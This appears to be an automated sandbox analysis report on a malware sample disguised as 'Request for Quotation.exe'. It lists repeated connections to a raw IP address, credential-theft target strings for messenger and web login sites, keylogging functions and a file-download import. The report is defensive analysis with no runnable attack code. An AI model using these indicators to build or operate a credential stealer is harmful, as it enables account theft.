          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: unknownTCP traffic detected without corresponding DNS query: 103.89.88.238
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00402149 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_2_00402149
          Source: Request for Quotation.exe, 00000004.00000002.652481642.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
          Source: Request for Quotation.exe, 00000003.00000003.653713973.00000000022C4000.00000004.00000001.sdmpString found in binary or memory: earchhttps://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3ktYWIQAzIFCAAQsQMyCAgAELEDEIMBMgUIABCxAzIFCAAQsQMyBQgAELEDMgUIABCxAzIICAAQsQMQgwEyAggAMgIIADIFCAAQsQM6CwguELEDEMcBEKMCOggILhCxAxCDAToOCC4QsQMQgwEQxwEQowI6CwguELEDEIMBEJMCOgUILhCxAzoLCC4QsQMQxwEQrwE6AgguUMpIWMFNYPhRaABwAHgAgAF_iAHIBJIBAzUuMZgBAKABAaoBB2d3cy13aXo&sclient=psy-ab&ved=0ahUKEwik3ey3rJDsAhU-BGMBHSocCmAQ4dUDCAw&uact=5https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/intl/en_uk/chrome/thank-you.htmlhttps://www.google.com/intl/en_uk/chrome/https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQFjAAegQIDhAB&url=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F&usg=AOvVaw3tRKGAbA7yncokivgyNZzyhttps://www.google.com/urlhttps://www.google.com/?gws_rd=sslhttps://www.google.com/http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https%3A%2F%2Fwww.google.com&cn=callout&pid=1&spid=1&hl=enhttps://ogs.google.com/widget/callouthttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=278&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=145&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591https://consent.google.com/done8https://consent.google.com/set?pc=s&uxe=4421591https://consent.google.com/sethttps://consent.google.com/?hl=en-GB&origin=https://www.goog
          Source: Request for Quotation.exe, 00000003.00000003.653713973.00000000022C4000.00000004.00000001.sdmpString found in binary or memory: earchhttps://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3ktYWIQAzIFCAAQsQMyCAgAELEDEIMBMgUIABCxAzIFCAAQsQMyBQgAELEDMgUIABCxAzIICAAQsQMQgwEyAggAMgIIADIFCAAQsQM6CwguELEDEMcBEKMCOggILhCxAxCDAToOCC4QsQMQgwEQxwEQowI6CwguELEDEIMBEJMCOgUILhCxAzoLCC4QsQMQxwEQrwE6AgguUMpIWMFNYPhRaABwAHgAgAF_iAHIBJIBAzUuMZgBAKABAaoBB2d3cy13aXo&sclient=psy-ab&ved=0ahUKEwik3ey3rJDsAhU-BGMBHSocCmAQ4dUDCAw&uact=5https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/intl/en_uk/chrome/thank-you.htmlhttps://www.google.com/intl/en_uk/chrome/https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQFjAAegQIDhAB&url=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F&usg=AOvVaw3tRKGAbA7yncokivgyNZzyhttps://www.google.com/urlhttps://www.google.com/?gws_rd=sslhttps://www.google.com/http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https%3A%2F%2Fwww.google.com&cn=callout&pid=1&spid=1&hl=enhttps://ogs.google.com/widget/callouthttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=278&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=145&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591https://consent.google.com/done8https://consent.google.com/set?pc=s&uxe=4421591https://consent.google.com/sethttps://consent.google.com/?hl=en-GB&origin=https://www.goog
          Source: Request for Quotation.exe, 00000003.00000003.652133843.00000000022C3000.00000004.00000001.sdmpString found in binary or memory: http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/searchhttps://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3ktYWIQAzIFCAAQsQMyCAgAELEDEIMBMgUIABCxAzIFCAAQsQMyBQgAELEDMgUIABCxAzIICAAQsQMQgwEyAggAMgIIADIFCAAQsQM6CwguELEDEMcBEKMCOggILhCxAxCDAToOCC4QsQMQgwEQxwEQowI6CwguELEDEIMBEJMCOgUILhCxAzoLCC4QsQMQxwEQrwE6AgguUMpIWMFNYPhRaABwAHgAgAF_iAHIBJIBAzUuMZgBAKABAaoBB2d3cy13aXo&sclient=psy-ab&ved=0ahUKEwik3ey3rJDsAhU-BGMBHSocCmAQ4dUDCAw&uact=5https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/intl/en_uk/chrome/thank-you.htmlhttps://www.google.com/intl/en_uk/chrome/https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQFjAAegQIDhAB&url=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F&usg=AOvVaw3tRKGAbA7yncokivgyNZzyhttps://www.google.com/urlhttps://www.google.com/?gws_rd=sslhttps://www.google.com/http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https%3A%2F%2Fwww.google.com&cn=callout&pid=1&spid=1&hl=enhttps://ogs.google.com/widget/callouthttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=278&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=145&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&
          Source: Request for Quotation.exe, 00000003.00000003.652133843.00000000022C3000.00000004.00000001.sdmpString found in binary or memory: http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/searchhttps://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3ktYWIQAzIFCAAQsQMyCAgAELEDEIMBMgUIABCxAzIFCAAQsQMyBQgAELEDMgUIABCxAzIICAAQsQMQgwEyAggAMgIIADIFCAAQsQM6CwguELEDEMcBEKMCOggILhCxAxCDAToOCC4QsQMQgwEQxwEQowI6CwguELEDEIMBEJMCOgUILhCxAzoLCC4QsQMQxwEQrwE6AgguUMpIWMFNYPhRaABwAHgAgAF_iAHIBJIBAzUuMZgBAKABAaoBB2d3cy13aXo&sclient=psy-ab&ved=0ahUKEwik3ey3rJDsAhU-BGMBHSocCmAQ4dUDCAw&uact=5https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/intl/en_uk/chrome/thank-you.htmlhttps://www.google.com/intl/en_uk/chrome/https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQFjAAegQIDhAB&url=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F&usg=AOvVaw3tRKGAbA7yncokivgyNZzyhttps://www.google.com/urlhttps://www.google.com/?gws_rd=sslhttps://www.google.com/http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https%3A%2F%2Fwww.google.com&cn=callout&pid=1&spid=1&hl=enhttps://ogs.google.com/widget/callouthttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=278&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=145&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&
          Source: Request for Quotation.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
          Source: Request for Quotation.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: Request for Quotation.exe, 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
          Source: Request for Quotation.exe, 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
          Source: Request for Quotation.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Request for Quotation.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: Request for Quotation.exeString found in binary or memory: http://www.ebuddy.com
          Source: Request for Quotation.exeString found in binary or memory: http://www.imvu.com
          Source: Request for Quotation.exe, 00000004.00000002.652481642.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
          Source: Request for Quotation.exe, 00000004.00000002.652481642.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.comr
          Source: Request for Quotation.exe, 00000003.00000002.654097061.0000000000193000.00000004.00000010.sdmpString found in binary or memory: http://www.nirsoft.net
          Source: Request for Quotation.exe, Request for Quotation.exe, 00000005.00000001.652992004.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.nirsoft.net/
          Source: Request for Quotation.exe, 00000003.00000003.652133843.00000000022C3000.00000004.00000001.sdmp, Request for Quotation.exe, 00000003.00000003.653713973.00000000022C4000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
          Source: Request for Quotation.exe, 00000003.00000003.653713973.00000000022C4000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/medianet.php?cid=8CU157172&cr
          Source: Request for Quotation.exeString found in binary or memory: https://login.yahoo.com/config/login
          Source: Request for Quotation.exe, 00000003.00000003.652407744.00000000022C3000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
          Source: Request for Quotation.exe, 00000003.00000003.652407744.00000000022C3000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
          Source: Request for Quotation.exeString found in binary or memory: https://www.google.com
          Source: Request for Quotation.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
          Source: Request for Quotation.exe, 00000003.00000003.653713973.00000000022C4000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Contains functionality to capture and log keystrokesShow sources
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [Esc] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [Enter] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [Tab] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [Down] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [Right] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [Up] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [Left] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [End] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [F2] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [F1] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [Del] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [Del] 1_2_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [Esc] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [Enter] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [Tab] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [Down] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [Right] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [Up] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [Left] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [End] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [F2] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [F1] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [Del] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: [Del] 1_1_00405EB2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004054B2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait1_2_0040D2A6
